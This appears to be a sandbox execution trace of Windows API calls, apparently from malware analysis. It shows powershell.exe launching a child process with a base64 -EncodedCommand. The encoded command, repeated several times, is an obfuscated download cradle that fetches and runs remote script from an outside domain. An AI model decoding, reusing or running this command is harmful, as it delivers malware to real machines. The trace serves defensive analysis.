	[0512.528] SetErrorMode (uMode=0x1) returned 0x1
	[0512.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0512.528] SetErrorMode (uMode=0x1) returned 0x1
	[0512.528] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0512.529] SetErrorMode (uMode=0x1) returned 0x1
	[0512.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0512.529] SetErrorMode (uMode=0x1) returned 0x1
	[0512.529] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0512.529] SetErrorMode (uMode=0x1) returned 0x1
	[0512.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0512.530] SetErrorMode (uMode=0x1) returned 0x1
	[0512.530] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0512.530] SetErrorMode (uMode=0x1) returned 0x1
	[0512.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0512.530] SetErrorMode (uMode=0x1) returned 0x1
	[0512.530] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0512.531] SetErrorMode (uMode=0x1) returned 0x1
	[0512.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0512.531] SetErrorMode (uMode=0x1) returned 0x1
	[0512.531] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0512.531] SetErrorMode (uMode=0x1) returned 0x1
	[0512.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0512.531] SetErrorMode (uMode=0x1) returned 0x1
	[0512.532] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0512.532] SetErrorMode (uMode=0x1) returned 0x1
	[0512.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0512.532] SetErrorMode (uMode=0x1) returned 0x1
	[0512.532] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0512.532] SetErrorMode (uMode=0x1) returned 0x1
	[0512.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0512.533] SetErrorMode (uMode=0x1) returned 0x1
	[0512.533] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0512.533] SetErrorMode (uMode=0x1) returned 0x1
	[0512.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0512.533] SetErrorMode (uMode=0x1) returned 0x1
	[0512.533] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1b910bf0
	[0512.535] FindNextFileW (in: hFindFile=0x1b910bf0, lpFindFileData=0x1c9ddfd0 | out: lpFindFileData=0x1c9ddfd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0512.535] FindClose (in: hFindFile=0x1b910bf0 | out: hFindFile=0x1b910bf0) returned 1
	[0512.535] SetErrorMode (uMode=0x1) returned 0x1
	[0512.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c9de0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0512.536] SetErrorMode (uMode=0x1) returned 0x1
	[0512.536] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c9de2f0 | out: lpFileInformation=0x1c9de2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0512.536] SetErrorMode (uMode=0x1) returned 0x1
	[0512.537] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0512.537] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.537] CoTaskMemFree (pv=0x1b91f4f0) 
	[0512.539] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0512.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.539] CoTaskMemFree (pv=0x1b91f4f0) 
	[0512.542] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0512.542] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.542] CoTaskMemFree (pv=0x1b91f4f0) 
	[0512.552] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0512.552] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.552] CoTaskMemFree (pv=0x1b91f4f0) 
	[0512.565] CoTaskMemAlloc (cb=0x3b) returned 0x470be0
	[0512.566] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c9de4d8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c9de4d8) returned 0x4550
	[0512.567] CoTaskMemFree (pv=0x470be0) 
	[0513.197] GetConsoleWindow () returned 0x2029a
	[0513.204] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0513.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0513.204] CoTaskMemFree (pv=0x1b91f4f0) 
	[0513.205] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0513.205] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0513.206] CoTaskMemFree (pv=0x1b91f4f0) 
	[0513.211] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0513.212] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0513.212] CoTaskMemFree (pv=0x1b91f4f0) 
	[0513.214] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c9de520 | out: pNumArgs=0x1c9de520) returned 0x1b93ad50*=""
	[0513.215] lstrlenW (lpString="-EncodedCommand") returned 15
	[0513.216] CoTaskMemAlloc (cb=0x22) returned 0x1b92b6b0
	[0513.216] RtlMoveMemory (in: Destination=0x1b92b6b0, Source=0x1b93ad72, Length=0x20 | out: Destination=0x1b92b6b0) 
	[0513.216] CoTaskMemFree (pv=0x1b92b6b0) 
	[0513.216] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0513.216] CoTaskMemAlloc (cb=0x2f4) returned 0x3f9cc0
	[0513.217] RtlMoveMemory (in: Destination=0x3f9cc0, Source=0x1b93ad92, Length=0x2f2 | out: Destination=0x3f9cc0) 
	[0513.217] CoTaskMemFree (pv=0x3f9cc0) 
	[0513.218] LocalFree (hMem=0x1b93ad50) returned 0x0
	[0513.218] CoTaskMemAlloc (cb=0x804) returned 0x1b959230
	[0513.218] GetConsoleTitleW (in: lpConsoleTitle=0x1b959230, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0513.219] CoTaskMemFree (pv=0x1b959230) 
	[0513.229] CoTaskMemAlloc (cb=0x38e) returned 0x1b93ad50
	[0513.229] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c9de480*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x31e3de8 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x31e3de8*(hProcess=0x348, hThread=0x198, dwProcessId=0x196c, dwThreadId=0x1970)) returned 1
	[0513.401] CoTaskMemFree (pv=0x1b93ad50) 
	[0513.402] CloseHandle (hObject=0x198) returned 1
	[0513.402] CoTaskMemAlloc (cb=0x3b) returned 0x470be0
	[0513.402] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c9de528, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c9de528) returned 0x4550
	[0513.403] CoTaskMemFree (pv=0x470be0) 
	[0513.406] GetCurrentProcess () returned 0xffffffffffffffff
	[0513.406] GetCurrentProcess () returned 0xffffffffffffffff
	[0513.406] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x348, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c9de608, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c9de608*=0x198) returned 1

Process:
	id = "25"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1c768000"
	os_pid = "0xaf4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 133
	os_tid = 0xaf0

	[0370.094] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0371.029] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0371.030] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0371.030] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0371.030] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0373.899] GetVersionExW (in: lpVersionInformation=0x28e000*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28e000*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0373.901] GetVersionExW (in: lpVersionInformation=0x28e000*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28e000*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0373.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0373.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0373.914] GetVersionExW (in: lpVersionInformation=0x28dd70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28dd70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0373.915] SetErrorMode (uMode=0x1) returned 0x1
	[0373.916] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x28ded0 | out: lpFileInformation=0x28ded0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0373.917] SetErrorMode (uMode=0x1) returned 0x1
	[0373.919] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x28e140 | out: lpdwHandle=0x28e140) returned 0x94c
	[0373.921] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c372d8 | out: lpData=0x2c372d8) returned 1
	[0374.281] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28e0b8, puLen=0x28e0b0 | out: lplpBuffer=0x28e0b8*=0x2c37374, puLen=0x28e0b0) returned 1
	[0374.283] lstrlenW (lpString="䅁") returned 1
	[0374.296] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x28e028, puLen=0x28e020 | out: lplpBuffer=0x28e028*=0x2c37450, puLen=0x28e020) returned 1
	[0374.297] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0374.299] CoTaskMemAlloc (cb=0x2e) returned 0x172210
	[0374.299] lstrcpyW (in: lpString1=0x172210, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0374.300] CoTaskMemFree (pv=0x172210) 
	[0374.300] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x28e028, puLen=0x28e020 | out: lplpBuffer=0x28e028*=0x2c374a4, puLen=0x28e020) returned 1
	[0374.301] lstrlenW (lpString="System.Management.Automation") returned 28
	[0374.301] CoTaskMemAlloc (cb=0x3c) returned 0xb9860
	[0374.301] lstrcpyW (in: lpString1=0xb9860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0374.301] CoTaskMemFree (pv=0xb9860) 
	[0374.301] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x28e028, puLen=0x28e020 | out: lplpBuffer=0x28e028*=0x2c37500, puLen=0x28e020) returned 1
	[0374.301] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0374.301] CoTaskMemAlloc (cb=0x20) returned 0x178a20
	[0374.301] lstrcpyW (in: lpString1=0x178a20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0374.301] CoTaskMemFree (pv=0x178a20) 
	[0374.301] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x28e028, puLen=0x28e020 | out: lplpBuffer=0x28e028*=0x2c37540, puLen=0x28e020) returned 1
	[0374.301] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0374.301] CoTaskMemAlloc (cb=0x44) returned 0xb9860
	[0374.301] lstrcpyW (in: lpString1=0xb9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0374.301] CoTaskMemFree (pv=0xb9860) 
	[0374.301] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x28e028, puLen=0x28e020 | out: lplpBuffer=0x28e028*=0x2c375a8, puLen=0x28e020) returned 1
	[0374.301] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0374.301] CoTaskMemAlloc (cb=0x76) returned 0x125530
